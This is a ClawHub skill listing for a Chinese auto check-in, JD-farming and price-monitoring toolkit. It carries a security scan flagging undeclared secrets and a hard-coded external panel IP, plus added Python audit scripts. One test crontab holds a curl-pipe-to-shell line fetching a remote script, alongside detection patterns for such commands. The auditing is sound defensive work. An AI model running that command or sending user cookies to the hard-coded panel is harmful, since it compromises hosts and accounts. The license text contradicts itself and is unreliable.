Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Wool Gathering

Wool Gathering (薅羊毛) all-in-one skill: automatic check-ins, price monitoring and coupon push. Supports Aliyun Drive, Baidu Netdisk, Bilibili, iQIYI, JD and other platforms. Covers QingLong panel deployment, dailycheckin configuration and price-crawler development.

MIT-0 · Free to use, modify, and redistribute. No attribution required.
0 · 12 · 0 current installs · 0 all-time installs
Security Scan
VirusTotal: Benign
OpenClaw: Suspicious (high confidence)
Purpose & Capability
The files (price crawlers, push notification, check-in helpers) align with the stated purpose of auto sign-in and price monitoring. However, the package metadata claims no required env vars or credentials, while the code and config templates expect many sensitive values (push tokens, email password, DB path, cookies). The SKILL.md also repeatedly references deploying to a QingLong panel, including a hard-coded address (43.133.55.138:5700); that address is unrelated to an individual user's environment and is unexpected in a generic skill.
Instruction Scope
The runtime instructions tell the user to interact with a QingLong container (docker exec, editing the crontab under /ql) and to add scheduled tasks. That is coherent with deploying scheduled sign-in tasks, but the docs include a specific external panel URL/IP and recommend editing container crontab files, operations that modify a third-party management system and create persistent scheduled jobs. The SKILL.md also points to cookie acquisition guides and asks you to provide cookies and tokens (sensitive). The instructions do not ask to read arbitrary host files beyond the skill/config, but they grant the skill broad discretion to run scheduled jobs on your QingLong instance.
Install Mechanism
There is no install spec (instruction-only in registry), and code files are included rather than being downloaded at runtime. That lowers supply-chain install risk. No remote archives or installers are fetched by the skill itself. However quick_start.sh and docker guidance will cause users to run code/containers on their systems — review those scripts before execution.
Credentials
Registry metadata declares no required environment variables, but config_loader and assets/config_template.json expect multiple sensitive environment variables and tokens (WOOL_SERVERCHAN_KEY, WOOL_PUSHPLUS_TOKEN, WOOL_EMAIL_PASSWORD, WOOL_DINGTALK_SECRET, etc.). The skill will accept and use secrets (cookies, push keys, SMTP password). This mismatch between declared and actual requirements is a red flag: the skill asks for secrets but didn't declare them up front in metadata.
Persistence & Privilege
The skill does not set always:true and does not request platform-level privileges. Nevertheless SKILL.md and scripts instruct adding cron entries into a QingLong container to run scheduled tasks (persistent jobs). That behavior is expected for a scheduler-based auto-checkin tool, but it creates a persistent attack surface on whatever system you deploy to (QingLong). The hard-coded panel IP in docs suggests an external management/monitoring reference that you should verify.
What to consider before installing
What to check before installing or running this skill:

1) Secrets and metadata mismatch: although the registry lists no required env vars, the code and config templates expect many sensitive values (push tokens, DingTalk secret, email password, cookies). Don't supply real primary-account cookies or passwords until you have audited the code. Prefer test/sandbox accounts.
2) Hard-coded external panel IP: SKILL.md documents a QingLong panel at 43.133.55.138:5700. Verify you control the panel you deploy to; do not point your deployment at an unknown remote host. Remove or replace any hard-coded addresses with your own.
3) Review scripts before running: inspect quick_start.sh, any cron-add instructions, and the code that writes to /ql/data/config/crontab.list. These create persistent scheduled tasks on your QingLong/container host.
4) Secrets storage: config_template.json stores the SMTP password and tokens in plain files. If you proceed, keep secrets in environment variables or a secrets manager and avoid committing config.json to shared storage.
5) Network and legal: the skill scrapes third-party sites (jd, taobao). Rate-limit and use small test runs to avoid violating terms of service or triggering IP blocks. Follow the SKILL.md "don't abuse" guidance.
6) Source verification: SKILL.md and package.json point to a GitHub repo. Confirm the repository and author are legitimate and review upstream commits for unexpected telemetry or exfiltration code.
7) Operational advice: run first in an isolated environment (VM/container) with network restrictions and test accounts; monitor outbound connections; do not expose your main accounts or credentials to this code until you have reviewed and hardened the configuration.

If you want, I can: (a) list the exact environment variables and config keys the code reads, (b) highlight every place in the code that sends data to external endpoints, or (c) generate a minimal-safe config.json example for sandbox testing.
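A static check covering items 1, 2 and 6 above, added here as an example; it is not part of the skill or of ClawHub's scanner. It walks a skill directory, collects every environment variable the Python code reads through `os.environ` / `os.getenv`, every hard-coded URL or IPv4 address in its text files, and every credential-looking leaf key in `assets/config_template.json`, then diffs the environment variables against what the registry metadata declares (for this skill: nothing). The files it writes to a temporary directory are constructed to resemble the scan findings (the `WOOL_*` names and the panel address quoted above) and are not the skill's real files. The matching is purely lexical, so values loaded indirectly (a dotenv loader, a shell wrapper) need their own pattern.

```python
"""Static audit of a skill directory (added example; not the skill's or ClawHub's code).

Reports: env vars the Python code reads vs. those the registry declares, hard-coded
URLs / IPv4 addresses in any text file, and secret-looking keys in the config template.
All heuristics are lexical (os.environ / os.getenv reads and string literals).
"""
from __future__ import annotations

import json
import re
import shutil
import tempfile
from pathlib import Path

# Matches os.environ["X"], os.environ.get("X") and os.getenv("X").
ENV_READ = re.compile(
    r"""os\.environ(?:\.get)?\s*[\[(]\s*['"]([A-Z][A-Z0-9_]*)['"]"""
    r"""|os\.getenv\s*\(\s*['"]([A-Z][A-Z0-9_]*)['"]"""
)
# http(s) URLs, or a bare dotted quad with optional port (3-part version strings do not match).
ENDPOINT = re.compile(r"""https?://[^\s'"<>]+|\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{2,5})?\b""")
SECRET_KEY = re.compile(r"token|secret|password|passwd|cookie|key", re.I)
TEXT_SUFFIXES = {".py", ".js", ".sh", ".md", ".json", ".yml", ".yaml", ".txt"}


def env_vars_read(root: Path) -> set[str]:
    """Names passed to os.environ / os.getenv in any .py file under root."""
    found: set[str] = set()
    for path in root.rglob("*.py"):
        for m in ENV_READ.finditer(path.read_text(encoding="utf-8", errors="replace")):
            found.add(m.group(1) or m.group(2))
    return found


def hardcoded_endpoints(root: Path, allow_hosts: set[str] = frozenset()) -> dict[str, list[str]]:
    """Relative file path -> ['lineno: endpoint', ...], skipping allow-listed hosts."""
    hits: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix not in TEXT_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for m in ENDPOINT.finditer(line):
                if any(host in m.group(0) for host in allow_hosts):
                    continue
                hits.setdefault(str(path.relative_to(root)), []).append(f"{lineno}: {m.group(0)}")
    return hits


def secret_keys_in_template(template: Path) -> dict[str, str]:
    """Dotted paths of leaf keys that look like credentials, and whether they are pre-filled."""
    if not template.exists():
        return {}
    out: dict[str, str] = {}

    def walk(node, prefix: str) -> None:
        if isinstance(node, dict):
            for key, value in node.items():
                walk(value, f"{prefix}.{key}" if prefix else key)
        elif SECRET_KEY.search(prefix):  # checks the whole dotted path, so a "keys" parent taints children
            out[prefix] = "empty" if node in ("", None) else "pre-filled"

    walk(json.loads(template.read_text(encoding="utf-8")), "")
    return out


def audit(root: Path, declared_env: set[str], allow_hosts: set[str] = frozenset()) -> dict:
    read = env_vars_read(root)
    return {
        "undeclared_env": sorted(read - declared_env),  # the metadata mismatch the scanner flagged
        "declared_but_unused": sorted(declared_env - read),
        "endpoints": hardcoded_endpoints(root, allow_hosts),
        "secret_keys": secret_keys_in_template(root / "assets" / "config_template.json"),
    }


# Constructed fixture resembling the scan findings; NOT the skill's real files.
FIXTURE = {
    "scripts/config_loader.py": (
        "import os\n"
        'SERVERCHAN = os.environ.get("WOOL_SERVERCHAN_KEY")\n'
        'PUSHPLUS = os.getenv("WOOL_PUSHPLUS_TOKEN", "")\n'
        'SMTP_PASSWORD = os.environ["WOOL_EMAIL_PASSWORD"]\n'
        'DINGTALK_SECRET = os.getenv("WOOL_DINGTALK_SECRET")\n'
    ),
    "SKILL.md": "# Panel address: http://43.133.55.138:5700\n# Schedule: 0 8 * * * dailycheckin\n",
    "assets/config_template.json": json.dumps({
        "push": {"serverchan_key": "", "pushplus_token": ""},
        "email": {"smtp_host": "smtp.example.com", "password": ""},
        "jd": {"cookie": ""},
        "db_path": "./wool.db",
    }),
}


def demo() -> dict:
    root = Path(tempfile.mkdtemp(prefix="skill-audit-"))
    try:
        for rel, content in FIXTURE.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(content, encoding="utf-8")
        # The registry metadata for this skill declares no required environment variables.
        return audit(root, declared_env=set())
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2, ensure_ascii=False))
```

Point `audit()` at the unpacked skill directory with `declared_env` taken from the registry metadata; anything in `undeclared_env` is a credential the skill will consume that the listing never told you about, and every entry in `endpoints` that is not your own host is something to replace before deployment.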


Current version: v1.2.3
latest: vk979np1c2de1zc57xw0rgkwcgd839hem


SKILL.md

Wool Gathering all-in-one skill v2.3

An automated toolkit for saving and earning money.

🎯 Core features

JD system (✅ live)

  • 22 scheduled tasks, dual-account support
  • Main earners: JD Bean collection, farm watering, Carnival City, PLUS blind box / exclusive gifts, etc.
  • Expected monthly earnings: ¥110-258 (two accounts)

Auto check-in (deployed)

  • Platforms: Aliyun Drive, Baidu Netdisk, Bilibili, iQIYI and others, 12 in total
  • Expected savings: ¥100-200 per month in membership fees

Price monitoring (planned)

Coupon push (planned)

🚀 Usage

# QingLong panel management
docker ps | grep qinglong
docker exec qinglong dailycheckin          # manual check-in
docker logs qinglong --tail 100            # view logs

# Panel address: http://43.133.55.138:5700
# Check-in schedule: 0 8 * * * dailycheckin
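The `0 8 * * * dailycheckin` line above is the kind of entry the skill ends up writing into the panel's `/ql/data/config/crontab.list` (item 3 of the scan report). The following is an added example, not code from the skill or from QingLong, of auditing that file after deployment: it assumes each entry is a standard five-field cron schedule followed by the command, which is the shape of the line above, accepts only commands you have reviewed, and flags anything that downloads and pipes into a shell, decodes an inline payload, or embeds a network address. The sample crontab, the task names in `REVIEWED` and the address 203.0.113.10 (a documentation range) are constructed for the demonstration.

```python
"""Audit a QingLong crontab.list after a skill has added its scheduled tasks.

Added example, not code from the skill or from QingLong. Assumes each entry is a
five-field cron schedule followed by the command (the shape of '0 8 * * * dailycheckin');
lines starting with '#' are comments.
"""
from __future__ import annotations

import re

CRON_LINE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.+?)\s*$")

# Command patterns worth a human look, reported in this order.
SUSPICIOUS = [
    ("pipe to shell", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|da|z)?sh\b")),
    ("decoded payload", re.compile(r"\bbase64\b.*(?:-d|--decode)\b")),
    ("inline eval", re.compile(r"\beval\b|\bpython3?\s+-c\b|\bnode\s+-e\b")),
    ("network literal", re.compile(r"https?://\S+|\b(?:\d{1,3}\.){3}\d{1,3}\b")),
]


def parse_crontab(text: str) -> list[tuple[int, str | None, str]]:
    """(lineno, schedule or None if malformed, command) for every non-comment line."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_LINE.match(line)
        entries.append((lineno, m.group(1), m.group(2)) if m else (lineno, None, line))
    return entries


def audit_crontab(text: str, reviewed_commands: set[str]) -> dict:
    """Entries outside the reviewed set, entries matching a suspicious pattern, malformed lines."""
    report: dict = {"unexpected": [], "suspicious": [], "malformed": []}
    for lineno, schedule, command in parse_crontab(text):
        if schedule is None:
            report["malformed"].append(lineno)
            continue
        if command not in reviewed_commands:
            report["unexpected"].append((lineno, schedule, command))
        for label, pattern in SUSPICIOUS:
            if pattern.search(command):
                report["suspicious"].append((lineno, label, command))
    return report


# Constructed sample; task names are hypothetical and 203.0.113.10 is a documentation address.
SAMPLE_CRONTAB = """\
# QingLong crontab.list (constructed sample)
0 8 * * * dailycheckin
*/30 * * * * task jd_bean_collect.js
15 3 * * * task jd_farm_water.js
0 */6 * * * curl -fsSL http://203.0.113.10/update.sh | sh
30 2 * * * task push_notification.py
every day dailycheckin
"""

# The commands you actually read and approved before deployment (hypothetical set).
REVIEWED = {"dailycheckin", "task jd_bean_collect.js", "task jd_farm_water.js"}


def demo() -> dict:
    return audit_crontab(SAMPLE_CRONTAB, REVIEWED)


if __name__ == "__main__":
    for key, items in demo().items():
        print(key)
        for item in items:
            print("  ", item)
```

In practice, feed it the real file with `docker exec qinglong cat /ql/data/config/crontab.list` and build `REVIEWED` from the commands you inspected in the skill's scripts; a non-empty `unexpected` list after a fresh install means the skill scheduled something its documentation did not mention.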

📁 Layout

wool-gathering/
├── scripts/          # executable scripts (price_monitor, push_notification, coupon_fetcher)
├── references/       # reference docs (qinglong-setup, platform-apis)
├── assets/           # config files (config_template.json, docker-compose.yml)
├── JD_PLUS_GUIDE.md
└── JD_EARNINGS_REPORT.md

⚠️ Notes

  • ✅ Compliant: auto check-in, price monitoring, affiliate-API coupons
  • ❌ Not allowed: malicious coupon grabbing, scraper abuse, fake orders and fake reviews
  • Refresh cookies regularly; test with a secondary account

See references/skill-details.md for the full platform list, the cookie acquisition tutorial and the price-monitor development guide.


📄 License and copyright

MIT License

Copyright (c) 2026 思捷娅科技 (SJYKJ)

Free to use, modify and redistribute; attribution is required.

Attribution

Commercial licensing

  • Personal / open source: free
  • Small business (<10 people): ¥999/year
  • Mid-size business (10-50 people): ¥4,999/year
  • Large business (>50 people): ¥19,999/year
  • Source code buyout: ¥99,999 one-time

For details see LICENSE

Files (19 total)